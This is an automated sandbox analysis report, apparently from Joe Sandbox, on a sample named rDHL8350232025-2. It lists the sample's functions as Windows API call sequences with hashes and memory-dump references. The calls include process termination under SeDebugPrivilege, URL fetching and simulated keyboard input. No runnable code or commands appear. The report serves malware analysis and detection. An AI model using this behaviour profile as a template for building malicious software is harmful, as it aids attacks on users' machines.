                                                                                      • Opcode Fuzzy Hash: 772fa45dd3188dc4a5f852cd547726591804bd8783e8427523d7b23ffddb4862
                                                                                      • Instruction Fuzzy Hash: 8F611971A04601AFEB25AFB49841FBE7BE7AF05350F04417EF98597242DA369E4187A0
                                                                                      APIs
                                                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00086890
                                                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 000868A9
                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 000868B9
                                                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 000868D1
                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 000868F2
                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00048874,00000000,00000000,00000000,000000FF,00000000), ref: 00086901
                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0008691E
                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00048874,00000000,00000000,00000000,000000FF,00000000), ref: 0008692D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 1268354404-0
                                                                                      • Opcode ID: 6dafdfae072e3c8e24a42bd24f1f8ec22f39a3e1cdcfaf8e46fa3a9e334745a6
                                                                                      • Instruction ID: d06ff88c92382ad4269b04c9f602de5f2fb15b9b7c1d1b79012bd4e43d49b41c
                                                                                      • Opcode Fuzzy Hash: 6dafdfae072e3c8e24a42bd24f1f8ec22f39a3e1cdcfaf8e46fa3a9e334745a6
                                                                                      • Instruction Fuzzy Hash: C5515AB0600205EFEB20DF24CC55FAE7BB5FB44750F108628F996972A0DB75E990DB94
                                                                                      APIs
                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000AC182
                                                                                      • GetLastError.KERNEL32 ref: 000AC195
                                                                                      • SetEvent.KERNEL32(?), ref: 000AC1A9
                                                                                        • Part of subcall function 000AC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000AC272
                                                                                        • Part of subcall function 000AC253: GetLastError.KERNEL32 ref: 000AC322
                                                                                        • Part of subcall function 000AC253: SetEvent.KERNEL32(?), ref: 000AC336
                                                                                        • Part of subcall function 000AC253: InternetCloseHandle.WININET(00000000), ref: 000AC341
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                      • String ID:
                                                                                      • API String ID: 337547030-0
                                                                                      • Opcode ID: ce1c52117203a57327d56b0312b7da77226c0ff49cf15af7341888862cb19124
                                                                                      • Instruction ID: 9c888ac863141b38a524e2384d632c8a6e02283ba8e92b7cb61aaa40a126d023
                                                                                      • Opcode Fuzzy Hash: ce1c52117203a57327d56b0312b7da77226c0ff49cf15af7341888862cb19124
                                                                                      • Instruction Fuzzy Hash: 7B31BE71200645AFFB219FE5DD04EAABBF8FF1A300B05452EF95A86610D735E810DBA0
                                                                                      APIs
                                                                                        • Part of subcall function 00093A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00093A57
                                                                                        • Part of subcall function 00093A3D: GetCurrentThreadId.KERNEL32 ref: 00093A5E
                                                                                        • Part of subcall function 00093A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000925B3), ref: 00093A65
                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 000925BD
                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 000925DB
                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 000925DF
                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 000925E9
                                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00092601
                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00092605
                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0009260F
                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00092623
                                                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00092627
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2014098862-0
                                                                                      • Opcode ID: 260cda2da3b8de5cbd366892a457d085662a199ace28fd4b4a20910ab3e77f3f
                                                                                      • Instruction ID: 2297a3c54597f6413d42c50a0d0bedc68d6da82e4f207af73ec04683fa05ccc6
                                                                                      • Opcode Fuzzy Hash: 260cda2da3b8de5cbd366892a457d085662a199ace28fd4b4a20910ab3e77f3f
                                                                                      • Instruction Fuzzy Hash: B101F230790610BBFB206769DC8AF993F59DF4EB12F110001F318AF1E2C9F22444DAAA
                                                                                      APIs
                                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00091449,?,?,00000000), ref: 0009180C
                                                                                      • HeapAlloc.KERNEL32(00000000,?,00091449,?,?,00000000), ref: 00091813
                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00091449,?,?,00000000), ref: 00091828
                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00091449,?,?,00000000), ref: 00091830
                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00091449,?,?,00000000), ref: 00091833
                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00091449,?,?,00000000), ref: 00091843
                                                                                      • GetCurrentProcess.KERNEL32(00091449,00000000,?,00091449,?,?,00000000), ref: 0009184B
                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00091449,?,?,00000000), ref: 0009184E
                                                                                      • CreateThread.KERNEL32(00000000,00000000,00091874,00000000,00000000,00000000), ref: 00091868
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                      • String ID:
                                                                                      • API String ID: 1957940570-0
                                                                                      • Opcode ID: 988dc9d0380e7eaa1fdc3bc85dad13b1867fd34d91671d5bcbfbb982e5167f0a
                                                                                      • Instruction ID: e77362e85b62c784bc5f8b533100d9aed017eedf83cd1aa7534de967fd0a4358
                                                                                      • Opcode Fuzzy Hash: 988dc9d0380e7eaa1fdc3bc85dad13b1867fd34d91671d5bcbfbb982e5167f0a
                                                                                      • Instruction Fuzzy Hash: 0001BBB5240348BFF710ABA6DC4DF6B3BACEB8AB11F044411FA09DB1A1CA749800CB20
                                                                                      APIs
                                                                                        • Part of subcall function 0009D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0009D501
                                                                                        • Part of subcall function 0009D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0009D50F
                                                                                        • Part of subcall function 0009D4DC: CloseHandle.KERNEL32(00000000), ref: 0009D5DC
                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000BA16D
                                                                                      • GetLastError.KERNEL32 ref: 000BA180
                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000BA1B3
                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 000BA268
                                                                                      • GetLastError.KERNEL32(00000000), ref: 000BA273
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000BA2C4
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                      • String ID: SeDebugPrivilege
                                                                                      • API String ID: 2533919879-2896544425
                                                                                      • Opcode ID: 3d02591d8c66173df777c9d88fb45191e5d256c3bd6db97610d3a9e6987ce72f
                                                                                      • Instruction ID: 14bab7f3154b8e1a7af7423a310a3b76818b980c0aed777553de2f20c8d222b1
                                                                                      • Opcode Fuzzy Hash: 3d02591d8c66173df777c9d88fb45191e5d256c3bd6db97610d3a9e6987ce72f
                                                                                      • Instruction Fuzzy Hash: B5619130204242AFE720DF19C494F99BBE5AF55318F18849CE45A8BBA3C776ED45CB92
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 000C3925
                                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 000C393A
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 000C3954
                                                                                      • _wcslen.LIBCMT ref: 000C3999
                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 000C39C6
                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 000C39F4
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window_wcslen
                                                                                      • String ID: SysListView32
                                                                                      • API String ID: 2147712094-78025650
                                                                                      • Opcode ID: 903011e81ae142259498ef190e6e234db7011f2ff63e10901466cd4cb801fcc8
                                                                                      • Instruction ID: 5128c7a4ef4d3a25f695c0837f5df19860282b2bca2791b9510d5e0ba328ffd5
                                                                                      • Opcode Fuzzy Hash: 903011e81ae142259498ef190e6e234db7011f2ff63e10901466cd4cb801fcc8
                                                                                      • Instruction Fuzzy Hash: CD41C231A10319ABEF219F64CC45FEE7BA9EF08350F10452AF948E7281D7B59E84CB90
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0009BCFD
                                                                                      • IsMenu.USER32(00000000), ref: 0009BD1D
                                                                                      • CreatePopupMenu.USER32 ref: 0009BD53
                                                                                      • GetMenuItemCount.USER32(00EF5DC0), ref: 0009BDA4
                                                                                      • InsertMenuItemW.USER32(00EF5DC0,?,00000001,00000030), ref: 0009BDCC
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                      • String ID: 0$2
                                                                                      • API String ID: 93392585-3793063076
                                                                                      • Opcode ID: 6ebdd1e76ee771b76961aef442c1a83c502e5f6c48df07eb5188be999dd18dfc
                                                                                      • Instruction ID: 397d7cc4d2680b48ac69564aec4048a7992ba1d014543532b0266e67c48b4da8
                                                                                      • Opcode Fuzzy Hash: 6ebdd1e76ee771b76961aef442c1a83c502e5f6c48df07eb5188be999dd18dfc
                                                                                      • Instruction Fuzzy Hash: C851B070A02209DBEF20CFA8EA88BAEBBF4BF45324F144159E456DB291E7709941DB51
                                                                                      APIs
                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0008F3AB,00000000,?,?,00000000,?,0008682C,00000004,00000000,00000000), ref: 000C824C
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 000C8272
                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 000C82D1
                                                                                      • ShowWindow.USER32(00000000,00000004), ref: 000C82E5
                                                                                      • EnableWindow.USER32(00000000,00000001), ref: 000C830B
                                                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 000C832F
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                      • String ID: p]
                                                                                      • API String ID: 642888154-1923361398
                                                                                      • Opcode ID: bbcde31bab9295200c2c70bc49f9f726f557b5fe54ed43cbff448d9ab2f8052c
                                                                                      • Instruction ID: 292b9e8cba85fcf0a3719ba5a9afad8327ee1bdf5bc1f4c06edccaf60a8da7d2
                                                                                      • Opcode Fuzzy Hash: bbcde31bab9295200c2c70bc49f9f726f557b5fe54ed43cbff448d9ab2f8052c
                                                                                      • Instruction Fuzzy Hash: D841A234601644EFEB61CF15C89DFEC7BE0FB0A714F1892ADE5484B2A2CB75A881CB54
                                                                                      APIs
                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 0009C913
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: IconLoad
                                                                                      • String ID: blank$info$question$stop$warning
                                                                                      • API String ID: 2457776203-404129466
                                                                                      • Opcode ID: af5d3c9b298bf207a8707104844dbbd3e8800f472176784948213f51f89eac33
                                                                                      • Instruction ID: 62dfccbf9acd0bbe8e1e9a2e3b606f4c36231d8ba09d5cd519614c4e20125c37
                                                                                      • Opcode Fuzzy Hash: af5d3c9b298bf207a8707104844dbbd3e8800f472176784948213f51f89eac33
                                                                                      • Instruction Fuzzy Hash: 48112B35A8D30BBAFB006B54DC86CEF77DCDF15319B20002AFA00A6183D7A55D407365
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: _wcslen$LocalTime
                                                                                      • String ID:
                                                                                      • API String ID: 952045576-0
                                                                                      • Opcode ID: 9f1e725e0b83db06a7b0b749dfa4a5e05822b4c1f869f3c00bf565448749935e
                                                                                      • Instruction ID: aebb186f47b63da8e41aae2210be7bec8a7ffd4ded99aa2ceb4c0c2b6f1cc888
                                                                                      • Opcode Fuzzy Hash: 9f1e725e0b83db06a7b0b749dfa4a5e05822b4c1f869f3c00bf565448749935e
                                                                                      • Instruction Fuzzy Hash: DA418E65C1021876CB21EBB4C88A9DFB7BCAF45711F508466E918E3123FB34E659C3A6
                                                                                      APIs
                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0008682C,00000004,00000000,00000000), ref: 0004F953
                                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0008682C,00000004,00000000,00000000), ref: 0008F3D1
                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0008682C,00000004,00000000,00000000), ref: 0008F454
                                                                                      Similarity
                                                                                      • API ID: ShowWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1268545403-0
                                                                                      • Opcode ID: ed3c8df6083c238ff9cd91bdd9bc143507d49fd0de72213effde5b580ee31794
                                                                                      • Instruction ID: dd1034f0f32012c44b671cd2989623e54749d98bbb2dc7e89cbab9e38edda851
                                                                                      • Opcode Fuzzy Hash: ed3c8df6083c238ff9cd91bdd9bc143507d49fd0de72213effde5b580ee31794
                                                                                      • Instruction Fuzzy Hash: 3E4128B0208682BAE779AF38C988F7A7BD1BF56314F14403DE0CB92561C775AD80CB15
                                                                                      APIs
                                                                                      • DeleteObject.GDI32(00000000), ref: 000C2D1B
                                                                                      • GetDC.USER32(00000000), ref: 000C2D23
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000C2D2E
                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 000C2D3A
                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 000C2D76
                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 000C2D87
                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,000C5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 000C2DC2
                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 000C2DE1
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3864802216-0
                                                                                      • Opcode ID: 1afcd9f24f074043833279da9f03d80442525f9146762b9a2e780b73efc3418a
                                                                                      • Instruction ID: 20347feb13cb65336bf39967c088e7200e97f88ce8e70f6ac440186d6ad02c65
                                                                                      • Opcode Fuzzy Hash: 1afcd9f24f074043833279da9f03d80442525f9146762b9a2e780b73efc3418a
                                                                                      • Instruction Fuzzy Hash: 1A317A72201614BFFB218F54CC8AFEB3BA9EF19715F084055FE099A2A1C6799C51CBA4
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: _memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 2931989736-0
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                      • API String ID: 0-572801152
                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,000717FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 000715CE
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,000717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00071651
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,000717FB,?,000717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 000716E4
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,000717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 000716FB
                                                                                        • Part of subcall function 00063820: RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,000717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00071777
                                                                                      • __freea.LIBCMT ref: 000717A2
                                                                                      • __freea.LIBCMT ref: 000717AE
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                      • String ID:
                                                                                      • API String ID: 2829977744-0
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit
                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                      • API String ID: 2610073882-625585964
                                                                                      APIs
                                                                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 000A125C
                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 000A1284
                                                                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 000A12A8
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000A12D8
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000A135F
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000A13C4
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000A1430
                                                                                      Similarity
                                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                      • String ID:
                                                                                      • API String ID: 2550207440-0
                                                                                      Similarity
                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                      • String ID:
                                                                                      • API String ID: 3225163088-0
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(?), ref: 000B396B
                                                                                      • CharUpperBuffW.USER32(?,?), ref: 000B3A7A
                                                                                      • _wcslen.LIBCMT ref: 000B3A8A
                                                                                      • VariantClear.OLEAUT32(?), ref: 000B3C1F
                                                                                        • Part of subcall function 000A0CDF: VariantInit.OLEAUT32(00000000), ref: 000A0D1F
                                                                                        • Part of subcall function 000A0CDF: VariantCopy.OLEAUT32(?,?), ref: 000A0D28
                                                                                        • Part of subcall function 000A0CDF: VariantClear.OLEAUT32(?), ref: 000A0D34
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                      • API String ID: 4137639002-1221869570
                                                                                      APIs
                                                                                        • Part of subcall function 0009000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?,?,0009035E), ref: 0009002B
                                                                                        • Part of subcall function 0009000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090046
                                                                                        • Part of subcall function 0009000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090054
                                                                                        • Part of subcall function 0009000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?), ref: 00090064
                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 000B4C51
                                                                                      • _wcslen.LIBCMT ref: 000B4D59
                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 000B4DCF
                                                                                      • CoTaskMemFree.OLE32(?), ref: 000B4DDA
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                      • String ID: NULL Pointer assignment
                                                                                      • API String ID: 614568839-2785691316
                                                                                      APIs
                                                                                      • GetMenu.USER32(?), ref: 000C2183
                                                                                      • GetMenuItemCount.USER32(00000000), ref: 000C21B5
                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 000C21DD
                                                                                      • _wcslen.LIBCMT ref: 000C2213
                                                                                      • GetMenuItemID.USER32(?,?), ref: 000C224D
                                                                                      • GetSubMenu.USER32(?,?), ref: 000C225B
                                                                                        • Part of subcall function 00093A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00093A57
                                                                                        • Part of subcall function 00093A3D: GetCurrentThreadId.KERNEL32 ref: 00093A5E
                                                                                        • Part of subcall function 00093A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000925B3), ref: 00093A65
                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 000C22E3
                                                                                        • Part of subcall function 0009E97B: Sleep.KERNEL32 ref: 0009E9F3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 4196846111-0
                                                                                      APIs
                                                                                      • GetParent.USER32(?), ref: 0009AEF9
                                                                                      • GetKeyboardState.USER32(?), ref: 0009AF0E
                                                                                      • SetKeyboardState.USER32(?), ref: 0009AF6F
                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 0009AF9D
                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 0009AFBC
                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 0009AFFD
                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0009B020
                                                                                      Similarity
                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                      • String ID:
                                                                                      • API String ID: 87235514-0
                                                                                      • Opcode ID: 70d12ae81cba0e39a921ef8510c574cac90c996b6a8658599eb102a05ec356fc
                                                                                      • Instruction ID: 0e13629705a38a930f69e8bbc1b842666b13620a744b83b577f27c1db84b0108
                                                                                      • Opcode Fuzzy Hash: 70d12ae81cba0e39a921ef8510c574cac90c996b6a8658599eb102a05ec356fc
                                                                                      • Instruction Fuzzy Hash: A951DFA0A047D53DFF368374CD59BBABEE95B06314F088499E1E9458C3C398A8C8E791
                                                                                      APIs
                                                                                      • GetParent.USER32(00000000), ref: 0009AD19
                                                                                      • GetKeyboardState.USER32(?), ref: 0009AD2E
                                                                                      • SetKeyboardState.USER32(?), ref: 0009AD8F
                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0009ADBB
                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0009ADD8
                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0009AE17
                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0009AE38
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                      • String ID:
                                                                                      • API String ID: 87235514-0
                                                                                      • Opcode ID: 4f6cf34f0c11ff043fb7a3eb65db32e97cf1547919b5c3012f9d66d7785e4f5a
                                                                                      • Instruction ID: 9a8ce4a993447c4808671d049b3f6fc21ebdc6990d0999d53c26849d815cf942
                                                                                      • Opcode Fuzzy Hash: 4f6cf34f0c11ff043fb7a3eb65db32e97cf1547919b5c3012f9d66d7785e4f5a
                                                                                      • Instruction Fuzzy Hash: A551B6A1A057D53DFF3683348C55BBA7ED95B47300F088589E1D6468C3D694EC84F7A2
                                                                                      APIs
                                                                                      • GetConsoleCP.KERNEL32(00073CD6,?,?,?,?,?,?,?,?,00065BA3,?,?,00073CD6,?,?), ref: 00065470
                                                                                      • __fassign.LIBCMT ref: 000654EB
                                                                                      • __fassign.LIBCMT ref: 00065506
                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00073CD6,00000005,00000000,00000000), ref: 0006552C
                                                                                      • WriteFile.KERNEL32(?,00073CD6,00000000,00065BA3,00000000,?,?,?,?,?,?,?,?,?,00065BA3,?), ref: 0006554B
                                                                                      • WriteFile.KERNEL32(?,?,00000001,00065BA3,00000000,?,?,?,?,?,?,?,?,?,00065BA3,?), ref: 00065584
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
